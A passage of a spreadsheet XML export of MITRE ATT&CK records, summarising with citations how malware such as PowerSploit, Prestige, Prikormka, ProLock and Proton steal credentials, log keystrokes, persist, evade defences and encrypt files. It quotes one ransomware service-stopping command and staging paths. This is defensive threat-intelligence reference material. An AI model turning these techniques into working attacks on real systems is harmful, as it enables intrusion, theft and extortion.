    <t>[PowerLess](https://attack.mitre.org/software/S1012) can use an encrypted channel for C2 communications.(Citation: Cybereason PowerLess February 2022)</t>
  </si>
  <si>
    <t>relationship--7340fcbe-e87b-4f16-bdac-e429a0ba7714</t>
  </si>
  <si>
    <t>[PowerLess](https://attack.mitre.org/software/S1012) can download additional payloads to a compromised host.(Citation: Cybereason PowerLess February 2022)</t>
  </si>
  <si>
    <t>relationship--4bd59ceb-eb44-45c0-b775-3eaea3307455</t>
  </si>
  <si>
    <t>[PowerLess](https://attack.mitre.org/software/S1012) can use a module to log keystrokes.(Citation: Cybereason PowerLess February 2022)</t>
  </si>
  <si>
    <t>relationship--06e5b331-d382-4864-ab8c-083e006ede8a</t>
  </si>
  <si>
    <t>[PowerLess](https://attack.mitre.org/software/S1012) can stage stolen browser data in `C:\\Windows\\Temp\\cup.tmp` and keylogger data in `C:\\Windows\\Temp\\Report.06E17A5A-7325-4325-8E5D-E172EBA7FC5BK`.(Citation: Cybereason PowerLess February 2022)</t>
  </si>
  <si>
    <t>relationship--87aaf244-2ecb-453e-87c0-836f9a26cc59</t>
  </si>
  <si>
    <t>[PowerLess](https://attack.mitre.org/software/S1012) is written in and executed via PowerShell without using powershell.exe.(Citation: Cybereason PowerLess February 2022)</t>
  </si>
  <si>
    <t>relationship--c001d2e1-0aa6-40ce-871e-5966199587cd</t>
  </si>
  <si>
    <t>[PowerPunch](https://attack.mitre.org/software/S0685) can use Base64-encoded scripts.(Citation: Microsoft Actinium February 2022)</t>
  </si>
  <si>
    <t>relationship--1a514acc-4385-4bcd-8451-5d5304e70066</t>
  </si>
  <si>
    <t>[PowerPunch](https://attack.mitre.org/software/S0685) can use the volume serial number from a target host to generate a unique XOR key for the next stage payload.(Citation: Microsoft Actinium February 2022)</t>
  </si>
  <si>
    <t>relationship--e8ddbb71-4b8e-44f1-a259-3801efc450b0</t>
  </si>
  <si>
    <t>[PowerPunch](https://attack.mitre.org/software/S0685) can download payloads from adversary infrastructure.(Citation: Microsoft Actinium February 2022)</t>
  </si>
  <si>
    <t>relationship--87b69ac6-d50d-4bbf-ac8b-7ad81b4e9ee8</t>
  </si>
  <si>
    <t>[PowerPunch](https://attack.mitre.org/software/S0685) has the ability to execute through PowerShell.(Citation: Microsoft Actinium February 2022)</t>
  </si>
  <si>
    <t>relationship--5238d74f-8d6c-420f-a521-f68937934842</t>
  </si>
  <si>
    <t>[PowerShower](https://attack.mitre.org/software/S0441) has used 7Zip to compress .txt, .pdf, .xls or .doc files prior to exfiltration.(Citation: Kaspersky Cloud Atlas August 2019)</t>
  </si>
  <si>
    <t>relationship--dd82b9d7-d60c-4dc0-97d7-244a1365a1e9</t>
  </si>
  <si>
    <t>[PowerShower](https://attack.mitre.org/software/S0441) has used a PowerShell document stealer module to pack and exfiltrate .txt, .pdf, .xls or .doc files smaller than 5MB that were modified during the past two days.(Citation: Kaspersky Cloud Atlas August 2019)</t>
  </si>
  <si>
    <t>relationship--8b02b838-22f8-469b-97f1-7185b06d286a</t>
  </si>
  <si>
    <t>[PowerShower](https://attack.mitre.org/software/S0441) has the ability to remove all files created during the dropper process.(Citation: Unit 42 Inception November 2018)</t>
  </si>
  <si>
    <t>relationship--38938464-b328-4d89-a3a3-7e1f68cb195e</t>
  </si>
  <si>
    <t>[PowerShower](https://attack.mitre.org/software/S0441) has added a registry key so future powershell.exe instances are spawned with coordinates for a window position off-screen by default.(Citation: Unit 42 Inception November 2018)</t>
  </si>
  <si>
    <t>relationship--dca41ced-2af1-4cec-8ed2-a1c77bc535ed</t>
  </si>
  <si>
    <t>[PowerShower](https://attack.mitre.org/software/S0441) has added a registry key so future powershell.exe instances are spawned off-screen by default, and has removed all registry entries that are left behind during the dropper process.(Citation: Unit 42 Inception November 2018)</t>
  </si>
  <si>
    <t>relationship--a679be02-156a-4e02-bfa5-ce07b60d147b</t>
  </si>
  <si>
    <t>[PowerShower](https://attack.mitre.org/software/S0441) is a backdoor written in PowerShell.(Citation: Unit 42 Inception November 2018)</t>
  </si>
  <si>
    <t>relationship--47747638-0f8d-4735-b16d-b52861dec73f</t>
  </si>
  <si>
    <t>[PowerShower](https://attack.mitre.org/software/S0441) has the ability to deploy a reconnaissance module to retrieve a list of the active processes.(Citation: Kaspersky Cloud Atlas August 2019)</t>
  </si>
  <si>
    <t>relationship--45098d46-2345-4fe4-8b07-2345ffbb9e60</t>
  </si>
  <si>
    <t>[PowerShower](https://attack.mitre.org/software/S0441) sets up persistence with a Registry run key.(Citation: Unit 42 Inception November 2018)</t>
  </si>
  <si>
    <t>relationship--79bae99a-8480-4857-834b-fa823adca4c6</t>
  </si>
  <si>
    <t>[PowerShower](https://attack.mitre.org/software/S0441) has the ability to encode C2 communications with base64 encoding.(Citation: Unit 42 Inception November 2018)(Citation: Kaspersky Cloud Atlas August 2019)</t>
  </si>
  <si>
    <t>relationship--98b19c5d-efbc-4e00-b7cc-71df5a1109e0</t>
  </si>
  <si>
    <t>[PowerShower](https://attack.mitre.org/software/S0441) has collected system information on the infected host.(Citation: Unit 42 Inception November 2018)</t>
  </si>
  <si>
    <t>relationship--175199ba-b8b8-467b-9010-a2f549abd957</t>
  </si>
  <si>
    <t>[PowerShower](https://attack.mitre.org/software/S0441) has the ability to identify the current Windows domain of the infected host.(Citation: Kaspersky Cloud Atlas August 2019)</t>
  </si>
  <si>
    <t>relationship--aaf0545f-bb47-4796-b23e-4780f354add9</t>
  </si>
  <si>
    <t>[PowerShower](https://attack.mitre.org/software/S0441) has the ability to identify the current user on the infected host.(Citation: Kaspersky Cloud Atlas August 2019)</t>
  </si>
  <si>
    <t>relationship--c737cde1-271e-4f00-9692-3784e075c24d</t>
  </si>
  <si>
    <t>[PowerShower](https://attack.mitre.org/software/S0441) has the ability to save and execute VBScript.(Citation: Unit 42 Inception November 2018)</t>
  </si>
  <si>
    <t>relationship--f5f463d9-d604-406e-89f3-dbf26ef74a69</t>
  </si>
  <si>
    <t>[PowerShower](https://attack.mitre.org/software/S0441) has sent HTTP GET and POST requests to C2 servers to send information and receive instructions.(Citation: Unit 42 Inception November 2018)</t>
  </si>
  <si>
    <t>relationship--a3bdd37c-f82c-4df3-94f8-63495466565c</t>
  </si>
  <si>
    <t>[PowerSploit](https://attack.mitre.org/software/S0194)'s &lt;code&gt;Invoke-TokenManipulation&lt;/code&gt; Exfiltration module can be used to manipulate tokens.(Citation: GitHub PowerSploit May 2012)(Citation: PowerSploit Documentation)</t>
  </si>
  <si>
    <t>relationship--56b59fda-e96d-443d-9f45-e4cc967c911a</t>
  </si>
  <si>
    <t>[PowerSploit](https://attack.mitre.org/software/S0194)'s &lt;code&gt;Get-MicrophoneAudio&lt;/code&gt; Exfiltration module can record system microphone audio.(Citation: GitHub PowerSploit May 2012)(Citation: PowerSploit Documentation)</t>
  </si>
  <si>
    <t>relationship--2a32c434-c3ef-42ee-a0b6-c64c589355c3</t>
  </si>
  <si>
    <t>[PowerSploit](https://attack.mitre.org/software/S0194) contains a collection of ScriptModification modules that compress and encode scripts and payloads.(Citation: GitHub PowerSploit May 2012)(Citation: PowerSploit Documentation)</t>
  </si>
  <si>
    <t>relationship--4d8df710-e1a4-4069-afef-2e8e63ed6587</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</si>
  <si>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</si>
  <si>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relationship--216b3711-fc70-4029-aaec-a8f021c38bef</t>
  </si>
  <si>
    <t>[PowerSploit](https://attack.mitre.org/software/S0194) contains a collection of Privesc-PowerUp modules that can discover and exploit DLL hijacking opportunities in services and processes.(Citation: GitHub PowerSploit May 2012)(Citation: PowerSploit Documentation)</t>
  </si>
  <si>
    <t>relationship--9bdcaf47-0df8-44a5-ac10-3f0a806a36f3</t>
  </si>
  <si>
    <t>[PowerSploit](https://attack.mitre.org/software/S0194) contains a collection of Exfiltration modules that can access data from local files, volumes, and processes.(Citation: GitHub PowerSploit May 2012)(Citation: PowerSploit Documentation)</t>
  </si>
  <si>
    <t>relationship--31334bcb-0207-41c8-b04a-96c7d6d1a466</t>
  </si>
  <si>
    <t>[PowerSploit](https://attack.mitre.org/software/S0194) has modules such as &lt;code&gt;Get-NetDomainTrust&lt;/code&gt; and &lt;code&gt;Get-NetForestTrust&lt;/code&gt; to enumerate domain and forest trusts.(Citation: GitHub PowerSploit May 2012)(Citation: PowerSploit Documentation)</t>
  </si>
  <si>
    <t>relationship--ee2068ec-c520-476e-979f-3dea201d0b9e</t>
  </si>
  <si>
    <t>[PowerSploit](https://attack.mitre.org/software/S0194) contains a collection of CodeExecution modules that inject code (DLL, shellcode) into a process.(Citation: GitHub PowerSploit May 2012)(Citation: PowerSploit Documentation)</t>
  </si>
  <si>
    <t>relationship--4bcd21d2-7583-4b82-8d33-2b153eeb6fdb</t>
  </si>
  <si>
    <t>[PowerSploit](https://attack.mitre.org/software/S0194) contains a collection of Exfiltration modules that can harvest credentials from Group Policy Preferences.(Citation: GitHub PowerSploit May 2012)(Citation: PowerSploit Documentation)</t>
  </si>
  <si>
    <t>relationship--3837e91f-47d5-4b30-b11b-76a91450c4ef</t>
  </si>
  <si>
    <t>[PowerSploit](https://attack.mitre.org/software/S0194)'s &lt;code&gt;Find-AVSignature&lt;/code&gt; AntivirusBypass module can be used to locate single byte anti-virus signatures.(Citation: GitHub PowerSploit May 2012)(Citation: PowerSploit Documentation)</t>
  </si>
  <si>
    <t>relationship--26eca19b-1c55-49b5-8a07-a4131c577874</t>
  </si>
  <si>
    <t>[PowerSploit](https://attack.mitre.org/software/S0194)'s &lt;code&gt;Invoke-Kerberoast&lt;/code&gt; module can request service tickets and return crackable ticket hashes.(Citation: PowerSploit Invoke Kerberoast)(Citation: Harmj0y Kerberoast Nov 2016)</t>
  </si>
  <si>
    <t>relationship--aaa0e944-7158-4baa-b45b-c687f7b161b5</t>
  </si>
  <si>
    <t>[PowerSploit](https://attack.mitre.org/software/S0194)'s &lt;code&gt;Get-Keystrokes&lt;/code&gt; Exfiltration module can log keystrokes.(Citation: GitHub PowerSploit May 2012)(Citation: PowerSploit Documentation)</t>
  </si>
  <si>
    <t>relationship--1bd467ff-6e94-40c5-ae4d-2ed7c62bc0d5</t>
  </si>
  <si>
    <t>[PowerSploit](https://attack.mitre.org/software/S0194) contains a collection of Exfiltration modules that can harvest credentials using [Mimikatz](https://attack.mitre.org/software/S0002).(Citation: GitHub PowerSploit May 2012)(Citation: PowerSploit Documentation)</t>
  </si>
  <si>
    <t>relationship--fa717a25-6be4-4cfd-ba02-1adc633f80ba</t>
  </si>
  <si>
    <t>[PowerSploit](https://attack.mitre.org/software/S0194)'s &lt;code&gt;Get-ProcessTokenGroup&lt;/code&gt; Privesc-PowerUp module can enumerate all SIDs associated with its current token.(Citation: GitHub PowerSploit May 2012)(Citation: PowerSploit Documentation)</t>
  </si>
  <si>
    <t>relationship--b70e19d8-9602-4795-9d9b-ef18cdbe5d51</t>
  </si>
  <si>
    <t>[PowerSploit](https://attack.mitre.org/software/S0194) contains a collection of Privesc-PowerUp modules that can discover and exploit path interception opportunities in the PATH environment variable.(Citation: GitHub PowerSploit May 2012)(Citation: PowerSploit Documentation)</t>
  </si>
  <si>
    <t>relationship--088d703a-f321-48d2-8090-12fc8179c6ff</t>
  </si>
  <si>
    <t>[PowerSploit](https://attack.mitre.org/software/S0194) contains a collection of Privesc-PowerUp modules that can discover and exploit search order hijacking vulnerabilities.(Citation: GitHub PowerSploit May 2012)(Citation: PowerSploit Documentation)</t>
  </si>
  <si>
    <t>relationship--9d038aa7-af97-4f60-ad5c-f74d20200c18</t>
  </si>
  <si>
    <t>[PowerSploit](https://attack.mitre.org/software/S0194) contains a collection of Privesc-PowerUp modules that can discover and exploit unquoted path vulnerabilities.(Citation: GitHub PowerSploit May 2012)(Citation: PowerSploit Documentation)</t>
  </si>
  <si>
    <t>relationship--2e202038-196d-41c7-8fdf-27b4fcf88830</t>
  </si>
  <si>
    <t>[PowerSploit](https://attack.mitre.org/software/S0194) modules are written in and executed via [PowerShell](https://attack.mitre.org/techniques/T1086).(Citation: GitHub PowerSploit May 2012)(Citation: PowerSploit Documentation)</t>
  </si>
  <si>
    <t>relationship--e7df8e8c-dfc4-48f2-bbd3-46b2572d60ca</t>
  </si>
  <si>
    <t>[PowerSploit](https://attack.mitre.org/software/S0194)'s &lt;code&gt;Get-ProcessTokenPrivilege&lt;/code&gt; Privesc-PowerUp module can enumerate privileges for a given process.(Citation: GitHub PowerSploit May 2012)(Citation: PowerSploit Documentation)</t>
  </si>
  <si>
    <t>relationship--c1cbaa0f-59d2-4b49-a91f-c21bff7ca009</t>
  </si>
  <si>
    <t>[PowerSploit](https://attack.mitre.org/software/S0194) contains a collection of Privesc-PowerUp modules that can query Registry keys for potential opportunities.(Citation: GitHub PowerSploit May 2012)(Citation: PowerSploit Documentation)</t>
  </si>
  <si>
    <t>relationship--312c929a-abf6-44c1-95d6-6dde60c7a3fe</t>
  </si>
  <si>
    <t>[PowerSploit](https://attack.mitre.org/software/S0194) reflectively loads a Windows PE file into a process.(Citation: GitHub PowerSploit May 2012)(Citation: PowerSploit Documentation)</t>
  </si>
  <si>
    <t>relationship--1da7a099-122d-4c26-b27f-f8acabdd7b44</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</si>
  <si>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</si>
  <si>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relationship--7b06929c-1b23-4efc-9fc1-64552d5fbdb2</t>
  </si>
  <si>
    <t>[PowerSploit](https://attack.mitre.org/software/S0194)'s &lt;code&gt;New-UserPersistenceOption&lt;/code&gt; Persistence argument can be used to establish via a [Scheduled Task/Job](https://attack.mitre.org/techniques/T1053).(Citation: GitHub PowerSploit May 2012)(Citation: PowerSploit Documentation)</t>
  </si>
  <si>
    <t>relationship--91c5d713-a89c-49fa-92eb-abaf18fae988</t>
  </si>
  <si>
    <t>[PowerSploit](https://attack.mitre.org/software/S0194)'s &lt;code&gt;Get-TimedScreenshot&lt;/code&gt; Exfiltration module can take screenshots at regular intervals.(Citation: GitHub PowerSploit May 2012)(Citation: PowerSploit Documentation)</t>
  </si>
  <si>
    <t>relationship--792c5ad3-87ca-473f-998b-654f29a5b10f</t>
  </si>
  <si>
    <t>[PowerSploit](https://attack.mitre.org/software/S0194)'s &lt;code&gt;Install-SSP&lt;/code&gt; Persistence module can be used to establish by installing a SSP DLL.(Citation: GitHub PowerSploit May 2012)(Citation: PowerSploit Documentation)</t>
  </si>
  <si>
    <t>relationship--be2d0ead-f24c-4b76-bdd9-695d163bcbf3</t>
  </si>
  <si>
    <t>[PowerSploit](https://attack.mitre.org/software/S0194) contains a collection of Exfiltration modules that can harvest credentials from Windows vault credential objects.(Citation: GitHub PowerSploit May 2012)(Citation: PowerSploit Documentation)</t>
  </si>
  <si>
    <t>relationship--da4e4583-7382-4a38-a922-9b5f6c61b8a7</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</si>
  <si>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</si>
  <si>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relationship--2d2ebfcb-0b2c-4c69-877e-2ca633c95a17</t>
  </si>
  <si>
    <t>[PowerSploit](https://attack.mitre.org/software/S0194) contains a collection of Privesc-PowerUp modules that can discover and replace/modify service binaries, paths, and configs.(Citation: GitHub PowerSploit May 2012)(Citation: PowerSploit Documentation)</t>
  </si>
  <si>
    <t>relationship--676d7d2c-86b6-4a59-8158-d371e5ca4f23</t>
  </si>
  <si>
    <t>[PowerStallion](https://attack.mitre.org/software/S0393) uses Microsoft OneDrive as a C2 server via a network drive mapped with &lt;code&gt;net use&lt;/code&gt;.(Citation: ESET Turla PowerShell May 2019)</t>
  </si>
  <si>
    <t>relationship--033a5e59-ab65-485b-a9c0-775977e8abd0</t>
  </si>
  <si>
    <t>[PowerStallion](https://attack.mitre.org/software/S0393) uses a XOR cipher to encrypt command output written to its OneDrive C2 server.(Citation: ESET Turla PowerShell May 2019)</t>
  </si>
  <si>
    <t>relationship--11ea144c-253e-4f68-bb2c-1f942cba6b54</t>
  </si>
  <si>
    <t>[PowerStallion](https://attack.mitre.org/software/S0393) uses PowerShell loops to iteratively check for available commands in its OneDrive C2 server.(Citation: ESET Turla PowerShell May 2019)</t>
  </si>
  <si>
    <t>relationship--392ae34f-3fb7-444b-a5cc-3a1ddcaa96a6</t>
  </si>
  <si>
    <t>[PowerStallion](https://attack.mitre.org/software/S0393) has been used to monitor process lists.(Citation: ESET Turla PowerShell May 2019)</t>
  </si>
  <si>
    <t>relationship--772089d3-b06e-4e5e-993b-1351f71484e7</t>
  </si>
  <si>
    <t>[PowerStallion](https://attack.mitre.org/software/S0393) modifies the MAC times of its local log files to match that of the victim's desktop.ini file.(Citation: ESET Turla PowerShell May 2019)</t>
  </si>
  <si>
    <t>relationship--63dc6102-8405-4273-8e73-7df7ef6c2514</t>
  </si>
  <si>
    <t>[Prestige](https://attack.mitre.org/software/S1058) has leveraged the CryptoPP C++ library to encrypt files on target systems using AES and appended filenames with `.enc`.(Citation: Microsoft Prestige ransomware October 2022)</t>
  </si>
  <si>
    <t>relationship--2a28ee8a-0ecd-43da-a4f8-a653ef5fd123</t>
  </si>
  <si>
    <t>23 January 2023</t>
  </si>
  <si>
    <t>[Prestige](https://attack.mitre.org/software/S1058) can traverse the file system to discover files to encrypt by identifying specific extensions defined in a hardcoded list.(Citation: Microsoft Prestige ransomware October 2022)</t>
  </si>
  <si>
    <t>relationship--bfe5c795-c95c-4387-b3d9-813078e7e99a</t>
  </si>
  <si>
    <t>[Prestige](https://attack.mitre.org/software/S1058) has been deployed using the Default Domain Group Policy Object from an Active Directory Domain Controller.(Citation: Microsoft Prestige ransomware October 2022)</t>
  </si>
  <si>
    <t>relationship--11285325-82f3-489a-9d10-05bd6564b423</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</si>
  <si>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</si>
  <si>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relationship--61b0b64f-da02-4f36-949e-016b83fa747f</t>
  </si>
  <si>
    <t>[Prestige](https://attack.mitre.org/software/S1058) has the ability to register new registry keys for a new extension handler via `HKCR\.enc` and `HKCR\enc\shell\open\command`.(Citation: Microsoft Prestige ransomware October 2022)</t>
  </si>
  <si>
    <t>relationship--86245eed-44d6-4a2a-ad83-1dd6a700a7be</t>
  </si>
  <si>
    <t xml:space="preserve">[Prestige](https://attack.mitre.org/software/S1058) has used the `Wow64DisableWow64FsRedirection()` and `Wow64RevertWow64FsRedirection()` functions to disable and restore file system redirection.(Citation: Microsoft Prestige ransomware October 2022) </t>
  </si>
  <si>
    <t>relationship--9654ee15-fdca-4d74-98b8-11a81a19d892</t>
  </si>
  <si>
    <t>[Prestige](https://attack.mitre.org/software/S1058) can use PowerShell for payload execution on targeted systems.(Citation: Microsoft Prestige ransomware October 2022)</t>
  </si>
  <si>
    <t>relationship--a8fb34b2-3de0-4ffa-a793-9f4cefa02ff9</t>
  </si>
  <si>
    <t>[Prestige](https://attack.mitre.org/software/S1058) has been executed on a target system through a scheduled task created by [Sandworm Team](https://attack.mitre.org/groups/G0034) using [Impacket](https://attack.mitre.org/software/S0357).(Citation: Microsoft Prestige ransomware October 2022)</t>
  </si>
  <si>
    <t>relationship--3bf633ad-4648-4610-ae68-9b3bbca7b512</t>
  </si>
  <si>
    <t>[Prestige](https://attack.mitre.org/software/S1058) has attempted to stop the MSSQL Windows service to ensure successful encryption using `C:\Windows\System32\net.exe stop MSSQLSERVER`.(Citation: Microsoft Prestige ransomware October 2022)</t>
  </si>
  <si>
    <t>relationship--28038d61-fe2d-443c-a573-2ec1dc1123e2</t>
  </si>
  <si>
    <t>S0113</t>
  </si>
  <si>
    <t>Prikormka</t>
  </si>
  <si>
    <t>malware--37cc7eb6-12e3-467b-82e8-f20f2cc73c69</t>
  </si>
  <si>
    <t>After collecting documents from removable media, [Prikormka](https://attack.mitre.org/software/S0113) compresses the collected files, and encrypts it with Blowfish.(Citation: ESET Operation Groundbait)</t>
  </si>
  <si>
    <t>relationship--fada6223-ba24-4c26-aa89-3998f07604f9</t>
  </si>
  <si>
    <t>A module in [Prikormka](https://attack.mitre.org/software/S0113) collects passwords stored in applications installed on the victim.(Citation: ESET Operation Groundbait)</t>
  </si>
  <si>
    <t>relationship--5c84cfe2-a395-47c6-831a-4491f8585a00</t>
  </si>
  <si>
    <t>A module in [Prikormka](https://attack.mitre.org/software/S0113) gathers logins and passwords stored in applications on the victims, including Google Chrome, Mozilla Firefox, and several other browsers.(Citation: ESET Operation Groundbait)</t>
  </si>
  <si>
    <t>relationship--5033a0a2-ef95-4ec6-b5ac-d7cfbd7be9f0</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</si>
  <si>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</si>
  <si>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relationship--6ce3735c-bfae-4eec-ab6b-bbf08cb7d60f</t>
  </si>
  <si>
    <t>[Prikormka](https://attack.mitre.org/software/S0113) contains a module that collects documents with certain extensions from removable media or fixed drives connected via USB.(Citation: ESET Operation Groundbait)</t>
  </si>
  <si>
    <t>relationship--96e928af-dbfc-4743-a1dc-353904e21fd3</t>
  </si>
  <si>
    <t>After encrypting its own log files, the log encryption module in [Prikormka](https://attack.mitre.org/software/S0113) deletes the original, unencrypted files from the host.(Citation: ESET Operation Groundbait)</t>
  </si>
  <si>
    <t>relationship--be5dadd8-71ce-40ac-8858-5d5c5fbe0e96</t>
  </si>
  <si>
    <t>A module in [Prikormka](https://attack.mitre.org/software/S0113) collects information about the paths, size, and creation time of files with specific file extensions, but not the actual content of the file.(Citation: ESET Operation Groundbait)</t>
  </si>
  <si>
    <t>relationship--e64a09d0-4205-4aca-8acb-f6926233d107</t>
  </si>
  <si>
    <t>[Prikormka](https://attack.mitre.org/software/S0113) contains a keylogger module that collects keystrokes and the titles of foreground windows.(Citation: ESET Operation Groundbait)</t>
  </si>
  <si>
    <t>relationship--1879905d-a4f6-43a7-aafe-a7e436e5c559</t>
  </si>
  <si>
    <t>[Prikormka](https://attack.mitre.org/software/S0113) creates a directory, &lt;code&gt;%USERPROFILE%\AppData\Local\SKC\&lt;/code&gt;, which is used to store collected log files.(Citation: ESET Operation Groundbait)</t>
  </si>
  <si>
    <t>relationship--df207207-01b2-456b-9dc4-7afd5ffeeb46</t>
  </si>
  <si>
    <t>Some resources in [Prikormka](https://attack.mitre.org/software/S0113) are encrypted with a simple XOR operation or encoded with Base64.(Citation: ESET Operation Groundbait)</t>
  </si>
  <si>
    <t>relationship--290a1ceb-68e1-42ae-be81-f474038aaa05</t>
  </si>
  <si>
    <t>A module in [Prikormka](https://attack.mitre.org/software/S0113) collects information on available printers and disk drives.(Citation: ESET Operation Groundbait)</t>
  </si>
  <si>
    <t>relationship--33e0178f-c9b2-43db-9e63-3e664ae6bef0</t>
  </si>
  <si>
    <t>[Prikormka](https://attack.mitre.org/software/S0113) adds itself to a Registry Run key with the name guidVGA or guidVSA.(Citation: ESET Operation Groundbait)</t>
  </si>
  <si>
    <t>relationship--c5fa4766-4468-4afd-9b5f-5ce4f443729d</t>
  </si>
  <si>
    <t>[Prikormka](https://attack.mitre.org/software/S0113) uses rundll32.exe to load its DLL.(Citation: ESET Operation Groundbait)</t>
  </si>
  <si>
    <t>relationship--216ab163-818b-4303-beb6-a743b90c98bf</t>
  </si>
  <si>
    <t>[Prikormka](https://attack.mitre.org/software/S0113) contains a module that captures screenshots of the victim's desktop.(Citation: ESET Operation Groundbait)</t>
  </si>
  <si>
    <t>relationship--290c4e3b-00be-411f-b0c8-919e85e08a49</t>
  </si>
  <si>
    <t>A module in [Prikormka](https://attack.mitre.org/software/S0113) collects information from the victim about installed anti-virus software.(Citation: ESET Operation Groundbait)</t>
  </si>
  <si>
    <t>relationship--98b7d901-4ede-451f-bab8-3b2b37c56bfd</t>
  </si>
  <si>
    <t>[Prikormka](https://attack.mitre.org/software/S0113) encodes C2 traffic with Base64.(Citation: ESET Operation Groundbait)</t>
  </si>
  <si>
    <t>relationship--9cf37d0b-a23d-4514-961d-94d1cc6e2bef</t>
  </si>
  <si>
    <t>[Prikormka](https://attack.mitre.org/software/S0113) encrypts some C2 traffic with the Blowfish cipher.(Citation: ESET Operation Groundbait)</t>
  </si>
  <si>
    <t>relationship--0d3e115b-ff08-4bff-8802-be3d21cec68f</t>
  </si>
  <si>
    <t>A module in [Prikormka](https://attack.mitre.org/software/S0113) collects information from the victim about Windows OS version, computer name, battery info, and physical memory.(Citation: ESET Operation Groundbait)</t>
  </si>
  <si>
    <t>relationship--7adaf2f3-52f2-40aa-b1ae-2fd2f05d9d56</t>
  </si>
  <si>
    <t>A module in [Prikormka](https://attack.mitre.org/software/S0113) collects information from the victim about its IP addresses and MAC addresses.(Citation: ESET Operation Groundbait)</t>
  </si>
  <si>
    <t>relationship--3caec960-fa9c-4b2f-80e4-6dd4471e26ba</t>
  </si>
  <si>
    <t>A module in [Prikormka](https://attack.mitre.org/software/S0113) collects information from the victim about the current user name.(Citation: ESET Operation Groundbait)</t>
  </si>
  <si>
    <t>relationship--fce2d07b-7bc7-497a-b21a-75a23fbccf50</t>
  </si>
  <si>
    <t>S0654</t>
  </si>
  <si>
    <t>ProLock</t>
  </si>
  <si>
    <t>malware--471d0e9f-2c8a-4e4b-8f3b-f85d2407806e</t>
  </si>
  <si>
    <t>[ProLock](https://attack.mitre.org/software/S0654) can use BITS jobs to download its malicious payload.(Citation: Group IB Ransomware September 2020)</t>
  </si>
  <si>
    <t>relationship--94e040f2-c1e7-4159-839f-c4a2497232f3</t>
  </si>
  <si>
    <t>[ProLock](https://attack.mitre.org/software/S0654) can encrypt files on a compromised host with RC6, and encrypts the key with RSA-1024.(Citation: Group IB Ransomware September 2020)</t>
  </si>
  <si>
    <t>relationship--3e3df746-053d-42e6-95c7-3f99c31be8be</t>
  </si>
  <si>
    <t>[ProLock](https://attack.mitre.org/software/S0654) can use CVE-2019-0859 to escalate privileges on a compromised host.(Citation: Group IB Ransomware September 2020)</t>
  </si>
  <si>
    <t>relationship--d910654b-9ebe-439e-b6f9-a8234bad7961</t>
  </si>
  <si>
    <t>[ProLock](https://attack.mitre.org/software/S0654) can remove files containing its payload after they are executed.(Citation: Group IB Ransomware September 2020)</t>
  </si>
  <si>
    <t>relationship--022d2514-26de-457f-8fb4-c5daf36eaef9</t>
  </si>
  <si>
    <t>[ProLock](https://attack.mitre.org/software/S0654) can use vssadmin.exe to remove volume shadow copies.(Citation: Group IB Ransomware September 2020)</t>
  </si>
  <si>
    <t>relationship--f86ad19e-67a2-453d-8af9-c73a130651a4</t>
  </si>
  <si>
    <t>[ProLock](https://attack.mitre.org/software/S0654) can use .jpg and .bmp files to store its payload.(Citation: Group IB Ransomware September 2020)</t>
  </si>
  <si>
    <t>relationship--b0557c84-d4c5-4016-8381-f419d18f2d47</t>
  </si>
  <si>
    <t>[ProLock](https://attack.mitre.org/software/S0654) can use WMIC to execute scripts on targeted hosts.(Citation: Group IB Ransomware September 2020)</t>
  </si>
  <si>
    <t>relationship--411ea36c-e237-4503-82f2-6e9d87a01380</t>
  </si>
  <si>
    <t>S0279</t>
  </si>
  <si>
    <t>Proton</t>
  </si>
  <si>
    <t>malware--c541efb4-e7b1-4ad6-9da8-b4e113f5dd42</t>
  </si>
  <si>
    <t>[Proton](https://attack.mitre.org/software/S0279) zips up files before exfiltrating them.(Citation: objsee mac malware 2017)</t>
  </si>
  <si>
    <t>relationship--e898c937-29b0-4e30-aeed-017ac3bbc3ed</t>
  </si>
  <si>
    <t>[Proton](https://attack.mitre.org/software/S0279) removes logs from &lt;code&gt;/var/logs&lt;/code&gt; and &lt;code&gt;/Library/logs&lt;/code&gt;.(Citation: objsee mac malware 2017)</t>
  </si>
  <si>
    <t>relationship--abd0cc1c-8901-4645-8853-c394ae8c573c</t>
  </si>
  <si>
    <t>[Proton](https://attack.mitre.org/software/S0279) gathers credentials for Google Chrome.(Citation: objsee mac malware 2017)</t>
  </si>
  <si>
    <t>relationship--9ca71386-44e2-41e5-aecf-796de464855d</t>
  </si>
  <si>
    <t>[Proton](https://attack.mitre.org/software/S0279) uses an encrypted file to store commands and configuration values.(Citation: objsee mac malware 2017)</t>
  </si>
  <si>
    <t>relationship--8183d862-5383-4a42-acbd-be58e120cb25</t>
  </si>
  <si>
    <t>[Proton](https://attack.mitre.org/software/S0279) kills security tools like Wireshark that are running.(Citation: objsee mac malware 2017)</t>
  </si>
  <si>
    <t>relationship--f298e191-bb50-48b2-ba3c-d432af8ec457</t>
  </si>
  <si>
    <t>[Proton](https://attack.mitre.org/software/S0279) removes all files in the /tmp directory.(Citation: objsee mac malware 2017)</t>
  </si>
  <si>
    <t>relationship--1f8760c6-f11c-43f7-acf8-bc30a347518c</t>
  </si>
  <si>
    <t>[Proton](https://attack.mitre.org/software/S0279) prompts users for their credentials.(Citation: objsee mac malware 2017)</t>
  </si>
  <si>
    <t>relationship--0908b4ce-fcfc-4307-a887-70fc8c27da3a</t>
  </si>
  <si>
    <t>[Proton](https://attack.mitre.org/software/S0279) gathers credentials in files for keychains.(Citation: objsee mac malware 2017)</t>
  </si>
  <si>
    <t>relationship--6209bf2d-6ffd-4740-96cb-ef04379ae126</t>
  </si>
  <si>
    <t>[Proton](https://attack.mitre.org/software/S0279) uses a keylogger to capture keystrokes.(Citation: objsee mac malware 2017)</t>
  </si>
  <si>
    <t>relationship--a1596d76-9ade-4acb-a570-2515f69a706e</t>
  </si>
  <si>
    <t>[Proton](https://attack.mitre.org/software/S0279) persists via Launch Agent.(Citation: objsee mac malware 2017)</t>
  </si>
  <si>
    <t>relationship--1308cf20-40b9-4163-bb68-b3f08b0f53b8</t>
  </si>
  <si>
    <t>[Proton](https://attack.mitre.org/software/S0279) gathers credentials in files for 1password.(Citation: objsee mac malware 2017)</t>
  </si>
  <si>
    <t>relationship--a95c8f0a-a7ba-4af0-b3ac-5abaf44ff563</t>
  </si>
  <si>
    <t>[Proton](https://attack.mitre.org/software/S0279) captures the content of the desktop with the screencapture binary.(Citation: objsee mac malware 2017)</t>
  </si>
  <si>
    <t>relationship--cdb1549e-d3e6-4826-8f42-ca85fa9d08eb</t>
  </si>
  <si>
    <t>[Proton](https://attack.mitre.org/software/S0279) modifies the tty_tickets line in the sudoers file.(Citation: objsee mac malware 2017)</t>
  </si>
  <si>
